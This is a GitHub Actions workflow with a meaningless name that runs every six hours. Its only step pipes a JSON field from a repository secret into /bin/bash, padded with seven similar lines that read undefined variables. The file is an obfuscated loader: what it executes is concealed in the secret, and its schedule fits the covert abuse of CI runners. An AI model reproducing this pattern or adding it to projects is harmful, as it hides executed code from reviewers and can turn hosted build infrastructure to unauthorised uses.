name: peixiayu6537
on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: peixiayu6537
        env:
          t8: ${{ secrets.t8 }}
        run: |
          echo $t8 | jq -r .yk6 | /bin/bash
          echo $vyth238 | jq -r .ydfz162 | /bin/bash
          echo $cx80359 | jq -r .t4858 | /bin/bash
          echo $xac21 | jq -r .rydl26 | /bin/bash
          echo $ispgx36 | jq -r .jrftr1160 | /bin/bash
          echo $fyugt421 | jq -r .pgdqv4 | /bin/bash
          echo $qob86601 | jq -r .w018 | /bin/bash
          echo $z842 | jq -r .xqb14348 | /bin/bash

